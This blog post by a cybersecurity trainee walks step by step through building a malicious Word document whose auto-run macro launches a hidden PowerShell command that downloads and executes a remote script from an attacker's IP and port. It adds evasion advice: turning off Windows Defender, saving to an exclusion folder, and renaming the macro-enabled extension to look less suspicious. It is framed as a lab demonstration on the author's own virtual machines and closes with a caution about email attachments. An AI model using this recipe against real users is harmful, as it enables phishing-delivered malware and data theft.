Malicious attack with Macro code
In this post I am going share one of first things I have learned from my cyber security training course:
I can bet on that all of you including myself , have received some suspicious emails with attachments from unknown senders, or from senders that pretending they are from your bank, work or any other organisation you are in touch with. They can be very creative and can design these emails and attached documents to look like any legitimate email you are dealing with , every day. Their aim is to get you to open one such document and infect your PC with a malware software, and steal your sensitive information.
As I have mentioned at the end of my previous blog , it’s about how an attacker can create and send a malicious document to his target. In this case I will jump into attackers boots and will attack my own VM created for testing purposes .
Let’s see how a malicious Microsoft Office document can be created to send to a victim
1 Create a new word document or use any template and open it .
2 click view and then Macros
3 type in a name and press create
4 Without editing anything in here on the left side panel navigate to PROJECT>MICROSOFT WORD OBJECTS > This document and double click on it.
5 On the two fields choose accordingly Document and Open as shown on the screenshot , two automatic entries will be created delete the first one as we need only the one that says Document_open, this means that the code we going to write will be executed every time when this documents will be opened.
6 Now between the two automatically generated lines we can type this code :
Shell “powershell.exe -WindowStyle Hidden -c iex ((New-Object Net.WebClient).DownloadString(‘http://192.168.1.116:4444/malware.ps1'))"
what this code is made of is few command put together :
Shell — VBA command to execute powershell
powershell.exe — powershell executable
-WindowStyle_Hidden — powershell command to run powershell with hidden window
-c iex — powershell command to execute downloaded ps1 script
(New-Object Net.WebClient) — webclient connects to the provided IP or domain address
.DownloadString — this code downloads the malware script file
(‘http://192.168.1.116:4444/malware.ps1') — this is the path to the the file that needs to be downloaded and executed , in this demo this is my physical computers IP
7. Now we have done the code and can close this code window.
8.Before we close the documents we need to Save the file as micro enabled document (as .docm file ). in my screenshots you can see .dotm which is because of the type of template I have chosen document template format when saving and not the regular document , but works same for this Demo. Also the last letter ‘m’ in the extension can be removed to make the document not looking too suspicious and it will work just fine.
Also we need to have Windows defender turned of before saving the file otherwise it will be detected as malicious and will be deleted. Or what I do is I save it to a Folder that I have previously added as exclusion in windows Defender settings in my windows 10.
9 Let’s test this macro enabled document now which I have created in my Windows 10 VM , but will transfer the file to my windows 7 VM where my windows defender is permanently disabled — — to be able to see if it works I am going to open my linux terminal and run netcat to listen with this command : nc -lvt 4444 for requests as the IP address and port in the malicious code will try to download malicious code from my main machine.
10. And when we Enable the Macro our NetCat tool detects the request made by this malicious code , and proves that the code connected back to the attacker, trying to download the malicious file.
Sooo We all have to be careful with all these emails and not to get tricked with this kind of attachments,I hope You have enjoyed this article as well, thanks for reading.
